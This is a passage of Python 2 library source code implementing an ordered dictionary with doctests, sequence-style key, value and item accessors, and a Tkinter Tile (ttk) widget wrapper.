# NOTE: doesn't return anything
self.setkeys(value)
else:
# FIXME: do we want to allow arbitrary setting of attributes?
# Or do we want to manage it?
object.__setattr__(self, name, value)
def __getattr__(self, name):
"""
Implemented so that access to ``sequence`` raises a warning.
>>> d = OrderedDict()
>>> d.sequence
[]
"""
if name == 'sequence':
warnings.warn('Use of the sequence attribute is deprecated.'
' Use the keys method instead.', DeprecationWarning)
# NOTE: Still (currently) returns a direct reference. Need to
# because code that uses sequence will expect to be able to
# mutate it in place.
return self._sequence
else:
# raise the appropriate error
raise AttributeError("OrderedDict has no '%s' attribute" % name)
def __deepcopy__(self, memo):
"""
To allow deepcopy to work with OrderedDict.
>>> from copy import deepcopy
>>> a = OrderedDict([(1, 1), (2, 2), (3, 3)])
>>> a['test'] = {}
>>> b = deepcopy(a)
>>> b == a
True
>>> b is a
False
>>> a['test'] is b['test']
False
"""
from copy import deepcopy
return self.__class__(deepcopy(self.items(), memo), self.strict)
### Read-only methods ###
def copy(self):
"""
>>> OrderedDict(((1, 3), (3, 2), (2, 1))).copy()
OrderedDict([(1, 3), (3, 2), (2, 1)])
"""
return OrderedDict(self)
def items(self):
"""
``items`` returns a list of tuples representing all the
``(key, value)`` pairs in the dictionary.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.items()
[(1, 3), (3, 2), (2, 1)]
>>> d.clear()
>>> d.items()
[]
"""
return zip(self._sequence, self.values())
def keys(self):
"""
Return a list of keys in the ``OrderedDict``.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.keys()
[1, 3, 2]
"""
return self._sequence[:]
def values(self, values=None):
"""
Return a list of all the values in the OrderedDict.
Optionally you can pass in a list of values, which will replace the
current list. The value list must be the same len as the OrderedDict.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.values()
[3, 2, 1]
"""
return [self[key] for key in self._sequence]
def iteritems(self):
"""
>>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iteritems()
>>> ii.next()
(1, 3)
>>> ii.next()
(3, 2)
>>> ii.next()
(2, 1)
>>> ii.next()
Traceback (most recent call last):
StopIteration
"""
def make_iter(self=self):
keys = self.iterkeys()
while True:
key = keys.next()
yield (key, self[key])
return make_iter()
def iterkeys(self):
"""
>>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iterkeys()
>>> ii.next()
1
>>> ii.next()
3
>>> ii.next()
2
>>> ii.next()
Traceback (most recent call last):
StopIteration
"""
return iter(self._sequence)
__iter__ = iterkeys
def itervalues(self):
"""
>>> iv = OrderedDict(((1, 3), (3, 2), (2, 1))).itervalues()
>>> iv.next()
3
>>> iv.next()
2
>>> iv.next()
1
>>> iv.next()
Traceback (most recent call last):
StopIteration
"""
def make_iter(self=self):
keys = self.iterkeys()
while True:
yield self[keys.next()]
return make_iter()
### Read-write methods ###
def clear(self):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.clear()
>>> d
OrderedDict([])
"""
dict.clear(self)
self._sequence = []
def pop(self, key, *args):
"""
No dict.pop in Python 2.2, gotta reimplement it
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.pop(3)
2
>>> d
OrderedDict([(1, 3), (2, 1)])
>>> d.pop(4)
Traceback (most recent call last):
KeyError: 4
>>> d.pop(4, 0)
0
>>> d.pop(4, 0, 1)
Traceback (most recent call last):
TypeError: pop expected at most 2 arguments, got 3
"""
if len(args) > 1:
raise TypeError, ('pop expected at most 2 arguments, got %s' %
(len(args) + 1))
if key in self:
val = self[key]
del self[key]
else:
try:
val = args[0]
except IndexError:
raise KeyError(key)
return val
def popitem(self, i=-1):
"""
Delete and return an item specified by index, not a random one as in
dict. The index is -1 by default (the last item).
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.popitem()
(2, 1)
>>> d
OrderedDict([(1, 3), (3, 2)])
>>> d.popitem(0)
(1, 3)
>>> OrderedDict().popitem()
Traceback (most recent call last):
KeyError: 'popitem(): dictionary is empty'
>>> d.popitem(2)
Traceback (most recent call last):
IndexError: popitem(): index 2 not valid
"""
if not self._sequence:
raise KeyError('popitem(): dictionary is empty')
try:
key = self._sequence[i]
except IndexError:
raise IndexError('popitem(): index %s not valid' % i)
return (key, self.pop(key))
def setdefault(self, key, defval = None):
"""
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.setdefault(1)
3
>>> d.setdefault(4) is None
True
>>> d
OrderedDict([(1, 3), (3, 2), (2, 1), (4, None)])
>>> d.setdefault(5, 0)
0
>>> d
OrderedDict([(1, 3), (3, 2), (2, 1), (4, None), (5, 0)])
"""
if key in self:
return self[key]
else:
self[key] = defval
return defval
def update(self, from_od):
"""
Update from another OrderedDict or sequence of (key, value) pairs
>>> d = OrderedDict(((1, 0), (0, 1)))
>>> d.update(OrderedDict(((1, 3), (3, 2), (2, 1))))
>>> d
OrderedDict([(1, 3), (0, 1), (3, 2), (2, 1)])
>>> d.update({4: 4})
Traceback (most recent call last):
TypeError: undefined order, cannot get items from dict
>>> d.update((4, 4))
Traceback (most recent call last):
TypeError: cannot convert dictionary update sequence element "4" to a 2-item sequence
"""
if isinstance(from_od, OrderedDict):
for key, val in from_od.items():
self[key] = val
elif isinstance(from_od, dict):
# we lose compatibility with other ordered dict types this way
raise TypeError('undefined order, cannot get items from dict')
else:
# FIXME: efficiency?
# sequence of 2-item sequences, or error
for item in from_od:
try:
key, val = item
except TypeError:
raise TypeError('cannot convert dictionary update'
' sequence element "%s" to a 2-item sequence' % item)
self[key] = val
def rename(self, old_key, new_key):
"""
Rename the key for a given value, without modifying sequence order.
For the case where new_key already exists this raise an exception,
since if new_key exists, it is ambiguous as to what happens to the
associated values, and the position of new_key in the sequence.
>>> od = OrderedDict()
>>> od['a'] = 1
>>> od['b'] = 2
>>> od.items()
[('a', 1), ('b', 2)]
>>> od.rename('b', 'c')
>>> od.items()
[('a', 1), ('c', 2)]
>>> od.rename('c', 'a')
Traceback (most recent call last):
ValueError: New key already exists: 'a'
>>> od.rename('d', 'b')
Traceback (most recent call last):
KeyError: 'd'
"""
if new_key == old_key:
# no-op
return
if new_key in self:
raise ValueError("New key already exists: %r" % new_key)
# rename sequence entry
value = self[old_key]
old_idx = self._sequence.index(old_key)
self._sequence[old_idx] = new_key
# rename internal dict entry
dict.__delitem__(self, old_key)
dict.__setitem__(self, new_key, value)
def setitems(self, items):
"""
This method allows you to set the items in the dict.
It takes a list of tuples - of the same sort returned by the ``items``
method.
>>> d = OrderedDict()
>>> d.setitems(((3, 1), (2, 3), (1, 2)))
>>> d
OrderedDict([(3, 1), (2, 3), (1, 2)])
"""
self.clear()
# FIXME: this allows you to pass in an OrderedDict as well :-)
self.update(items)
def setkeys(self, keys):
"""
``setkeys`` all ows you to pass in a new list of keys which will
replace the current set. This must contain the same set of keys, but
need not be in the same order.
If you pass in new keys that don't match, a ``KeyError`` will be
raised.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.keys()
[1, 3, 2]
>>> d.setkeys((1, 2, 3))
>>> d
OrderedDict([(1, 3), (2, 1), (3, 2)])
>>> d.setkeys(['a', 'b', 'c'])
Traceback (most recent call last):
KeyError: 'Keylist is not the same as current keylist.'
"""
# FIXME: Efficiency? (use set for Python 2.4 :-)
# NOTE: list(keys) rather than keys[:] because keys[:] returns
# a tuple, if keys is a tuple.
kcopy = list(keys)
kcopy.sort()
self._sequence.sort()
if kcopy != self._sequence:
raise KeyError('Keylist is not the same as current keylist.')
# NOTE: This makes the _sequence attribute a new object, instead
# of changing it in place.
# FIXME: efficiency?
self._sequence = list(keys)
def setvalues(self, values):
"""
You can pass in a list of values, which will replace the
current list. The value list must be the same len as the OrderedDict.
(Or a ``ValueError`` is raised.)
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.setvalues((1, 2, 3))
>>> d
OrderedDict([(1, 1), (3, 2), (2, 3)])
>>> d.setvalues([6])
Traceback (most recent call last):
ValueError: Value list is not the same length as the OrderedDict.
"""
if len(values) != len(self):
# FIXME: correct error to raise?
raise ValueError('Value list is not the same length as the '
'OrderedDict.')
self.update(zip(self, values))
### Sequence Methods ###
def index(self, key):
"""
Return the position of the specified key in the OrderedDict.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.index(3)
1
>>> d.index(4)
Traceback (most recent call last):
ValueError: list.index(x): x not in list
"""
return self._sequence.index(key)
def insert(self, index, key, value):
"""
Takes ``index``, ``key``, and ``value`` as arguments.
Sets ``key`` to ``value``, so that ``key`` is at position ``index`` in
the OrderedDict.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.insert(0, 4, 0)
>>> d
OrderedDict([(4, 0), (1, 3), (3, 2), (2, 1)])
>>> d.insert(0, 2, 1)
>>> d
OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2)])
>>> d.insert(8, 8, 1)
>>> d
OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2), (8, 1)])
"""
if key in self:
# FIXME: efficiency?
del self[key]
self._sequence.insert(index, key)
dict.__setitem__(self, key, value)
def reverse(self):
"""
Reverse the order of the OrderedDict.
>>> d = OrderedDict(((1, 3), (3, 2), (2, 1)))
>>> d.reverse()
>>> d
OrderedDict([(2, 1), (3, 2), (1, 3)])
"""
self._sequence.reverse()
def sort(self, *args, **kwargs):
"""
Sort the key order in the OrderedDict.
This method takes the same arguments as the ``list.sort`` method on
your version of Python.
>>> d = OrderedDict(((4, 1), (2, 2), (3, 3), (1, 4)))
>>> d.sort()
>>> d
OrderedDict([(1, 4), (2, 2), (3, 3), (4, 1)])
"""
self._sequence.sort(*args, **kwargs)
class Keys(object):
# FIXME: should this object be a subclass of list?
"""
Custom object for accessing the keys of an OrderedDict.
Can be called like the normal ``OrderedDict.keys`` method, but also
supports indexing and sequence methods.
"""
def __init__(self, main):
self._main = main
def __call__(self):
"""Pretend to be the keys method."""
return self._main._keys()
def __getitem__(self, index):
"""Fetch the key at position i."""
# NOTE: this automatically supports slicing :-)
return self._main._sequence[index]
def __setitem__(self, index, name):
"""
You cannot assign to keys, but you can do slice assignment to re-order
them.
You can only do slice assignment if the new set of keys is a reordering
of the original set.
"""
if isinstance(index, types.SliceType):
# FIXME: efficiency?
# check length is the same
indexes = range(len(self._main._sequence))[index]
if len(indexes) != len(name):
raise ValueError('attempt to assign sequence of size %s '
'to slice of size %s' % (len(name), len(indexes)))
# check they are the same keys
# FIXME: Use set
old_keys = self._main._sequence[index]
new_keys = list(name)
old_keys.sort()
new_keys.sort()
if old_keys != new_keys:
raise KeyError('Keylist is not the same as current keylist.')
orig_vals = [self._main[k] for k in name]
del self._main[index]
vals = zip(indexes, name, orig_vals)
vals.sort()
for i, k, v in vals:
if self._main.strict and k in self._main:
raise ValueError('slice assignment must be from '
'unique keys')
self._main.insert(i, k, v)
else:
raise ValueError('Cannot assign to keys')
### following methods pinched from UserList and adapted ###
def __repr__(self): return repr(self._main._sequence)
# FIXME: do we need to check if we are comparing with another ``Keys``
# object? (like the __cast method of UserList)
def __lt__(self, other): return self._main._sequence < other
def __le__(self, other): return self._main._sequence <= other
def __eq__(self, other): return self._main._sequence == other
def __ne__(self, other): return self._main._sequence != other
def __gt__(self, other): return self._main._sequence > other
def __ge__(self, other): return self._main._sequence >= other
# FIXME: do we need __cmp__ as well as rich comparisons?
def __cmp__(self, other): return cmp(self._main._sequence, other)
def __contains__(self, item): return item in self._main._sequence
def __len__(self): return len(self._main._sequence)
def __iter__(self): return self._main.iterkeys()
def count(self, item): return self._main._sequence.count(item)
def index(self, item, *args): return self._main._sequence.index(item, *args)
def reverse(self): self._main._sequence.reverse()
def sort(self, *args, **kwds): self._main._sequence.sort(*args, **kwds)
def __mul__(self, n): return self._main._sequence*n
__rmul__ = __mul__
def __add__(self, other): return self._main._sequence + other
def __radd__(self, other): return other + self._main._sequence
## following methods not implemented for keys ##
def __delitem__(self, i): raise TypeError('Can\'t delete items from keys')
def __iadd__(self, other): raise TypeError('Can\'t add in place to keys')
def __imul__(self, n): raise TypeError('Can\'t multiply keys in place')
def append(self, item): raise TypeError('Can\'t append items to keys')
def insert(self, i, item): raise TypeError('Can\'t insert items into keys')
def pop(self, i=-1): raise TypeError('Can\'t pop items from keys')
def remove(self, item): raise TypeError('Can\'t remove items from keys')
def extend(self, other): raise TypeError('Can\'t extend keys')
class Items(object):
"""
Custom object for accessing the items of an OrderedDict.
Can be called like the normal ``OrderedDict.items`` method, but also
supports indexing and sequence methods.
"""
def __init__(self, main):
self._main = main
def __call__(self):
"""Pretend to be the items method."""
return self._main._items()
def __getitem__(self, index):
"""Fetch the item at position i."""
if isinstance(index, types.SliceType):
# fetching a slice returns an OrderedDict
return self._main[index].items()
key = self._main._sequence[index]
return (key, self._main[key])
def __setitem__(self, index, item):
"""Set item at position i to item."""
if isinstance(index, types.SliceType):
# NOTE: item must be an iterable (list of tuples)
self._main[index] = OrderedDict(item)
else:
# FIXME: Does this raise a sensible error?
orig = self._main.keys[index]
key, value = item
if self._main.strict and key in self and (key != orig):
raise ValueError('slice assignment must be from '
'unique keys')
# delete the current one
del self._main[self._main._sequence[index]]
self._main.insert(index, key, value)
def __delitem__(self, i):
"""Delete the item at position i."""
key = self._main._sequence[i]
if isinstance(i, types.SliceType):
for k in key:
# FIXME: efficiency?
del self._main[k]
else:
del self._main[key]
### following methods pinched from UserList and adapted ###
def __repr__(self): return repr(self._main.items())
# FIXME: do we need to check if we are comparing with another ``Items``
# object? (like the __cast method of UserList)
def __lt__(self, other): return self._main.items() < other
def __le__(self, other): return self._main.items() <= other
def __eq__(self, other): return self._main.items() == other
def __ne__(self, other): return self._main.items() != other
def __gt__(self, other): return self._main.items() > other
def __ge__(self, other): return self._main.items() >= other
def __cmp__(self, other): return cmp(self._main.items(), other)
def __contains__(self, item): return item in self._main.items()
def __len__(self): return len(self._main._sequence) # easier :-)
def __iter__(self): return self._main.iteritems()
def count(self, item): return self._main.items().count(item)
def index(self, item, *args): return self._main.items().index(item, *args)
def reverse(self): self._main.reverse()
def sort(self, *args, **kwds): self._main.sort(*args, **kwds)
def __mul__(self, n): return self._main.items()*n
__rmul__ = __mul__
def __add__(self, other): return self._main.items() + other
def __radd__(self, other): return other + self._main.items()
def append(self, item):
"""Add an item to the end."""
# FIXME: this is only append if the key isn't already present
key, value = item
self._main[key] = value
def insert(self, i, item):
key, value = item
self._main.insert(i, key, value)
def pop(self, i=-1):
key = self._main._sequence[i]
return (key, self._main.pop(key))
def remove(self, item):
key, value = item
try:
assert value == self._main[key]
except (KeyError, AssertionError):
raise ValueError('ValueError: list.remove(x): x not in list')
else:
del self._main[key]
def extend(self, other):
# FIXME: is only a true extend if none of the keys already present
for item in other:
key, value = item
self._main[key] = value
def __iadd__(self, other):
self.extend(other)
## following methods not implemented for items ##
def __imul__(self, n): raise TypeError('Can\'t multiply items in place')
class Values(object):
"""
Custom object for accessing the values of an OrderedDict.
Can be called like the normal ``OrderedDict.values`` method, but also
supports indexing and sequence methods.
"""
def __init__(self, main):
self._main = main
def __call__(self):
"""Pretend to be the values method."""
return self._main._values()
def __getitem__(self, index):
"""Fetch the value at position i."""
if isinstance(index, types.SliceType):
return [self._main[key] for key in self._main._sequence[index]]
else:
return self._main[self._main._sequence[index]]
def __setitem__(self, index, value):
"""
Set the value at position i to value.
You can only do slice assignment to values if you supply a sequence of
equal length to the slice you are replacing.
"""
if isinstance(index, types.SliceType):
keys = self._main._sequence[index]
if len(keys) != len(value):
raise ValueError('attempt to assign sequence of size %s '
'to slice of size %s' % (len(name), len(keys)))
# FIXME: efficiency? Would be better to calculate the indexes
# directly from the slice object
# NOTE: the new keys can collide with existing keys (or even
# contain duplicates) - these will overwrite
for key, val in zip(keys, value):
self._main[key] = val
else:
self._main[self._main._sequence[index]] = value
### following methods pinched from UserList and adapted ###
def __repr__(self): return repr(self._main.values())
# FIXME: do we need to check if we are comparing with another ``Values``
# object? (like the __cast method of UserList)
def __lt__(self, other): return self._main.values() < other
def __le__(self, other): return self._main.values() <= other
def __eq__(self, other): return self._main.values() == other
def __ne__(self, other): return self._main.values() != other
def __gt__(self, other): return self._main.values() > other
def __ge__(self, other): return self._main.values() >= other
def __cmp__(self, other): return cmp(self._main.values(), other)
def __contains__(self, item): return item in self._main.values()
def __len__(self): return len(self._main._sequence) # easier :-)
def __iter__(self): return self._main.itervalues()
def count(self, item): return self._main.values().count(item)
def index(self, item, *args): return self._main.values().index(item, *args)
def reverse(self):
"""Reverse the values"""
vals = self._main.values()
vals.reverse()
# FIXME: efficiency
self[:] = vals
def sort(self, *args, **kwds):
"""Sort the values."""
vals = self._main.values()
vals.sort(*args, **kwds)
self[:] = vals
def __mul__(self, n): return self._main.values()*n
__rmul__ = __mul__
def __add__(self, other): return self._main.values() + other
def __radd__(self, other): return other + self._main.values()
## following methods not implemented for values ##
def __delitem__(self, i): raise TypeError('Can\'t delete items from values')
def __iadd__(self, other): raise TypeError('Can\'t add in place to values')
def __imul__(self, n): raise TypeError('Can\'t multiply values in place')
def append(self, item): raise TypeError('Can\'t append items to values')
def insert(self, i, item): raise TypeError('Can\'t insert items into values')
def pop(self, i=-1): raise TypeError('Can\'t pop items from values')
def remove(self, item): raise TypeError('Can\'t remove items from values')
def extend(self, other): raise TypeError('Can\'t extend values')
class SequenceOrderedDict(OrderedDict):
"""
Experimental version of OrderedDict that has a custom object for ``keys``,
``values``, and ``items``.
These are callable sequence objects that work as methods, or can be
manipulated directly as sequences.
Test for ``keys``, ``items`` and ``values``.
>>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)))
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d.keys
[1, 2, 3]
>>> d.keys()
[1, 2, 3]
>>> d.setkeys((3, 2, 1))
>>> d
SequenceOrderedDict([(3, 4), (2, 3), (1, 2)])
>>> d.setkeys((1, 2, 3))
>>> d.keys[0]
1
>>> d.keys[:]
[1, 2, 3]
>>> d.keys[-1]
3
>>> d.keys[-2]
2
>>> d.keys[0:2] = [2, 1]
>>> d
SequenceOrderedDict([(2, 3), (1, 2), (3, 4)])
>>> d.keys.reverse()
>>> d.keys
[3, 1, 2]
>>> d.keys = [1, 2, 3]
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d.keys = [3, 1, 2]
>>> d
SequenceOrderedDict([(3, 4), (1, 2), (2, 3)])
>>> a = SequenceOrderedDict()
>>> b = SequenceOrderedDict()
>>> a.keys == b.keys
1
>>> a['a'] = 3
>>> a.keys == b.keys
0
>>> b['a'] = 3
>>> a.keys == b.keys
1
>>> b['b'] = 3
>>> a.keys == b.keys
0
>>> a.keys > b.keys
0
>>> a.keys < b.keys
1
>>> 'a' in a.keys
1
>>> len(b.keys)
2
>>> 'c' in d.keys
0
>>> 1 in d.keys
1
>>> [v for v in d.keys]
[3, 1, 2]
>>> d.keys.sort()
>>> d.keys
[1, 2, 3]
>>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)), strict=True)
>>> d.keys[::-1] = [1, 2, 3]
>>> d
SequenceOrderedDict([(3, 4), (2, 3), (1, 2)])
>>> d.keys[:2]
[3, 2]
>>> d.keys[:2] = [1, 3]
Traceback (most recent call last):
KeyError: 'Keylist is not the same as current keylist.'
>>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)))
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d.values
[2, 3, 4]
>>> d.values()
[2, 3, 4]
>>> d.setvalues((4, 3, 2))
>>> d
SequenceOrderedDict([(1, 4), (2, 3), (3, 2)])
>>> d.values[::-1]
[2, 3, 4]
>>> d.values[0]
4
>>> d.values[-2]
3
>>> del d.values[0]
Traceback (most recent call last):
TypeError: Can't delete items from values
>>> d.values[::2] = [2, 4]
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> 7 in d.values
0
>>> len(d.values)
3
>>> [val for val in d.values]
[2, 3, 4]
>>> d.values[-1] = 2
>>> d.values.count(2)
2
>>> d.values.index(2)
0
>>> d.values[-1] = 7
>>> d.values
[2, 3, 7]
>>> d.values.reverse()
>>> d.values
[7, 3, 2]
>>> d.values.sort()
>>> d.values
[2, 3, 7]
>>> d.values.append('anything')
Traceback (most recent call last):
TypeError: Can't append items to values
>>> d.values = (1, 2, 3)
>>> d
SequenceOrderedDict([(1, 1), (2, 2), (3, 3)])
>>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)))
>>> d
SequenceOrderedDict([(1, 2), (2, 3), (3, 4)])
>>> d.items()
[(1, 2), (2, 3), (3, 4)]
>>> d.setitems([(3, 4), (2 ,3), (1, 2)])
>>> d
SequenceOrderedDict([(3, 4), (2, 3), (1, 2)])
>>> d.items[0]
(3, 4)
>>> d.items[:-1]
[(3, 4), (2, 3)]
>>> d.items[1] = (6, 3)
>>> d.items
[(3, 4), (6, 3), (1, 2)]
>>> d.items[1:2] = [(9, 9)]
>>> d
SequenceOrderedDict([(3, 4), (9, 9), (1, 2)])
>>> del d.items[1:2]
>>> d
SequenceOrderedDict([(3, 4), (1, 2)])
>>> (3, 4) in d.items
1
>>> (4, 3) in d.items
0
>>> len(d.items)
2
>>> [v for v in d.items]
[(3, 4), (1, 2)]
>>> d.items.count((3, 4))
1
>>> d.items.index((1, 2))
1
>>> d.items.index((2, 1))
Traceback (most recent call last):
ValueError: list.index(x): x not in list
>>> d.items.reverse()
>>> d.items
[(1, 2), (3, 4)]
>>> d.items.reverse()
>>> d.items.sort()
>>> d.items
[(1, 2), (3, 4)]
>>> d.items.append((5, 6))
>>> d.items
[(1, 2), (3, 4), (5, 6)]
>>> d.items.insert(0, (0, 0))
>>> d.items
[(0, 0), (1, 2), (3, 4), (5, 6)]
>>> d.items.insert(-1, (7, 8))
>>> d.items
[(0, 0), (1, 2), (3, 4), (7, 8), (5, 6)]
>>> d.items.pop()
(5, 6)
>>> d.items
[(0, 0), (1, 2), (3, 4), (7, 8)]
>>> d.items.remove((1, 2))
>>> d.items
[(0, 0), (3, 4), (7, 8)]
>>> d.items.extend([(1, 2), (5, 6)])
>>> d.items
[(0, 0), (3, 4), (7, 8), (1, 2), (5, 6)]
"""
def __init__(self, init_val=(), strict=True):
OrderedDict.__init__(self, init_val, strict=strict)
self._keys = self.keys
self._values = self.values
self._items = self.items
self.keys = Keys(self)
self.values = Values(self)
self.items = Items(self)
self._att_dict = {
'keys': self.setkeys,
'items': self.setitems,
'values': self.setvalues,
}
def __setattr__(self, name, value):
"""Protect keys, items, and values."""
if not '_att_dict' in self.__dict__:
object.__setattr__(self, name, value)
else:
try:
fun = self._att_dict[name]
except KeyError:
OrderedDict.__setattr__(self, name, value)
else:
fun(value)
# Tile wrapping copied from http://tkinter.unpythonic.net/wiki/TileWrapper.
# Will be able to replace with ttk from Python 2.7, eventually.
# only create these gui classes if Tkinter is available (so param does
# not depend on Tkinter).
try:
import Tkinter
from Tkconstants import * # CB: should get the specific imports and move to section below
Tkinter_imported = True
except ImportError:
Tkinter_imported = False
if Tkinter_imported:
if Tkinter.TkVersion >= 8.5:
class Style:
def default(self, style, **kw):
"""Sets the default value of the specified option(s) in style"""
pass
def map_style(self, **kw):
"""Sets dynamic values of the specified option(s) in style. See
"STATE MAPS", below."""
pass
def layout(self, style, layoutSpec):
"""Define the widget layout for style style. See "LAYOUTS" below
for the format of layoutSpec. If layoutSpec is omitted, return the
layout specification for style style. """
pass
def element_create(self, name, type, *args):
"""Creates a new element in the current theme of type type. The
only built-in element type is image (see image(n)), although
themes may define other element types (see
Ttk_RegisterElementFactory).
"""
pass
def element_names(self):
"""Returns a list of all elements defined in the current theme. """
pass
def theme_create(self, name, parent=None, basedon=None):
"""Creates a new theme. It is an error if themeName already exists.
If -parent is specified, the new theme will inherit styles, elements,
and layouts from the parent theme basedon. If -settings is present,
script is evaluated in the context of the new theme as per style theme
settings.
"""
pass
def theme_settings(self, name, script):
"""Temporarily sets the current theme to themeName, evaluate script,
then restore the previous theme. Typically script simply defines styles
and elements, though arbitrary Tcl code may appear.
"""
pass
def theme_names(self):
"""Returns a list of the available themes. """
return self.tk.call("style", "theme", "names")
def theme_use(self, theme):
"""Sets the current theme to themeName, and refreshes all widgets."""
return self.tk.call("style", "theme", "use", theme)
class Widget(Tkinter.Widget, Style):
def __init__(self, master, widgetName=None, cnf={}, kw={}, extra=()):
if not widgetName:
## why you would ever want to create a Tile Widget is behond me!
widgetName="ttk::widget"
Tkinter.Widget.__init__(self, master, widgetName, cnf, kw)
def instate(self, spec=None, script=None):
"""Test the widget's state. If script is not specified, returns 1
if the widget state matches statespec and 0 otherwise. If script
is specified, equivalent to if {[pathName instate stateSpec]}
script.
"""
return self.tk.call(self._w, "instate", spec, script)
def state(self, spec=None):
"""Modify or inquire widget state. If stateSpec is present, sets
the widget state: for each flag in stateSpec, sets the corresponding
flag or clears it if prefixed by an exclamation point. Returns a new
state spec indicating which flags were changed: ''set changes
[pathName state spec] ; pathName state $changes'' will restore
pathName to the original state. If stateSpec is not specified,
returns a list of the currently-enabled state flags.
"""
return self.tk.call(self._w, "state", spec)
class Button(Widget, Tkinter.Button):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::button", cnf, kw)
###add frame support here--KWs
class Frame(Widget, Tkinter.Frame):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::frame", cnf, kw)
class Checkbutton(Widget, Tkinter.Checkbutton):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::checkbutton", cnf, kw)
class Combobox(Widget, Tkinter.Entry):
def __init__(self, master=None, cnf={}, **kw):
# HACK to work around strange parsing of list
if 'values' in kw:
values = kw['values']
if isinstance(values,list):
kw['values'] = tuple(values)
Widget.__init__(self, master, "ttk::combobox", cnf, kw)
def current(self, index=None):
"""If index is supplied, sets the combobox value to the element
at position newIndex in the list of -values. Otherwise, returns
the index of the current value in the list of -values or -1 if
the current value does not appear in the list.
"""
return self.tk.call(self._w, "current", index)
class Entry(Widget, Tkinter.Entry):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::entry", cnf, kw)
def validate(self):
"""Force revalidation, independent of the conditions specified by
the -validate option. Returns 0 if the -validatecommand returns a
false value, or 1 if it returns a true value or is not specified.
"""
return self.tk.call(self._w, "validate")
class Label(Widget, Tkinter.Label):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::label", cnf, kw)
###add LabelFrame class here--KW
class LabelFrame(Widget, Tkinter.Label):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::labelframe", cnf, kw)
class Menubutton(Widget, Tkinter.Menubutton):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::menubutton", cnf, kw)
class Notebook(Widget):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::notebook", cnf, kw)
def add(self, child, cnf=(), **kw):
"""Adds a new tab to the notebook. When the tab is selected, the
child window will be displayed. child must be a direct child of
the notebook window. See TAB OPTIONS for the list of available
options.
"""
return self.tk.call((self._w, "add", child) + self._options(cnf, kw))
def forget(self, index):
"""Removes the tab specified by index, unmaps and unmanages the
associated child window.
"""
return self.tk.call(self._w, "forget", index)
def index(self, index):
"""Returns the numeric index of the tab specified by index, or
the total number of tabs if index is the string "end".
"""
return self.tk.call(self._w, "index")
def select(self, index):
"""Selects the specified tab; the associated child pane will
be displayed, and the previously-selected pane (if different)
is unmapped.
"""
return self.tk.call(self._w, "select", index)
def tab(self, index, **kw):
"""Query or modify the options of the specific tab. If no
-option is specified, returns a dictionary of the tab option
values. If one -option is specified, returns the value of tha
t option. Otherwise, sets the -options to the corresponding
values. See TAB OPTIONS for the available options.
"""
return self.tk.call((self._w, "tab", index) + self._options(kw))
def tabs(self):
"""Returns a list of all pane windows managed by the widget."""
return self.tk.call(self._w, "tabs")
class Paned(Widget):
"""
WIDGET OPTIONS
Name Database name Database class
-orient orient Orient
Specifies the orientation of the window. If vertical, subpanes
are stacked top-to-bottom; if horizontal, subpanes are stacked
left-to-right.
PANE OPTIONS
The following options may be specified for each pane:
Name Database name Database class
-weight weight Weight
An integer specifying the relative stretchability of the pane.
When the paned window is resized, the extra space is added or
subracted to each pane proportionally to its -weight
"""
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::panedwindow", cnf, kw)
def add(self, subwindow, **kw):
"""Adds a new pane to the window. subwindow must be a direct child of
the paned window pathname. See PANE OPTIONS for the list of available
options.
"""
return self.tk.call((self._w, "add", subwindow) + self._options(kw))
def forget(self, pane):
"""Removes the specified subpane from the widget. pane is either an
integer index or the name of a managed subwindow.
"""
self.tk.call(self._w, "forget", pane)
def insert(self, pos, subwindow, **kw):
"""Inserts a pane at the specified position. pos is either the string
end, an integer index, or the name of a managed subwindow. If subwindow
is already managed by the paned window, moves it to the specified
position. See PANE OPTIONS for the list of available options.
"""
return self.tk.call((self._w, "insert", pos, subwindow) + self._options(kw))
def pane(self, pane, **kw):
"""Query or modify the options of the specified pane, where pane is
either an integer index or the name of a managed subwindow. If no
-option is specified, returns a dictionary of the pane option values.
If one -option is specified, returns the value of that option.
Otherwise, sets the -options to the corresponding values.
"""
return self.tk.call((self._w, "pane", pane) + self._options(kw))
class Progressbar(Widget):
def __init__(self, master=None, cnf={}, **kw):
Widget.__init__(self, master, "ttk::progressbar", cnf, kw)
def step(self, amount=1.0):
"""Increments the -value by amount. amount defaults to 1.0
if omitted. """
return self.tk.call(self._w, "step", amount)
def start(self):
self.tk.call("ttk::progressbar::start", self._w)
def stop(self):
self.tk.call("ttk::progressbar::stop", self._w)
